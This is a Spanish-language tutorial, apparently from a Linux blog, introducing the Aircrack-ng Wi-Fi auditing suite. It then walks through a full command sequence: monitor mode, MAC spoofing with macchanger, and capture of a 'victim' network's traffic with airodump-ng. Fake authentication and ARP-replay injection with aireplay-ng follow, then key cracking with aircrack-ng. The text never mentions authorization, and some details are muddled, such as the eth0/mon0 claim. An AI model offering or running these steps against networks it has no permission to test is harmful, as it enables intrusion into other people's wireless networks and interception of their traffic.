Actualizado el lunes, 4 septiembre, 2017
Aircrack- ng es un paquete completo de herramientas para evaluar la seguridad de la red Wi-Fi.
Se centra en varios ámbitos de la seguridad Wi-Fi:
- Monitoreo: La captura de paquetes y exportación de datos en archivos de texto para su posterior procesamiento con herramientas de terceros.
- Atacar: los ataques de repetición, desautentificación, puntos de acceso falsos y otros a través de la inyección de paquetes.
- Pruebas: Comprobación de tarjetas WiFi y capacidades de los controladores (de captura y de inyección).
- Cracking: WEP y WPA PSK (WPA 1 y 2).
Todas las herramientas que componen el paquete de aircrack trabajan en línea de comandos. Aunque existen muchas interfaces gráficas para el mismo y una excelente prueba de ello sería wifislax. Aunque su uso está orientado a Linux, también puede correr en Windows, OS X, FreeBSD, OpenBSD, NetBSD, incluso Solaris y eComStation 2.
Comenzamos:
Primero identificamos nuestra tarjeta de red, recuerda que si tu tarjeta no es compatible con el modo monitor, no funcionará, la tarjeta tiene que arrojar los valores: eth0 y mon0.
Activamos el modo monitor en nuestra tarjeta de red:
sudo airmon-ng start wlan0
Damos de baja mon0:
sudo ifconfig mon0 down
Cambiaremos la dirección MAC de mon0 por »00:11:22:33:44:55«:
sudo macchanger -m 00:11:22:33:44:55 mon0
Damos de alta mon0:
sudo ifconfig mon0 up
Escaneamos las redes, hasta localizar una víctima:
sudo airodump-ng mon0
Detenemos el escaneo con Ctrl -c.
Ejecutamos airodump-ng, cambiamos los datos entre corchetes por los de nuestra víctima:
sudo airodump-ng -c [# canal] -w [nombre red] --bssid [dirección MAC] mon0
En los pasos siguientes deberemos abrir nuevas terminales o consolas, es importante que no cierres las que ya tienes abiertas.
Abrimos otra terminal cambiando los datos entre corchetes por los de la víctima:
sudo aireplay-ng -1 6000 -a [direccion MAC victima] -h 00:11:22:33:44:55 mon0
Abrimos otra terminal:
aireplay-ng -3 -b [dirección MAC victima ] -h 00:11:22:33:44:55 mon0
Abrimos otra terminal:
aireplay-ng -1 0 -e (Nomb red) -a (mac victima) -h 00:11:22:33:44:55 mon0
Abrimos la última terminal:
aircrack-ng (nombre de la red)-01.cap
Y con todo esto ya tenemos nuestro archivo *.cap (captura). Podemos investigar en el.
Más artículos sobre Aircrack: https://www.sololinux.es/testar-password-wifi-aircrack-ng/
Web del proyecto: Aircrack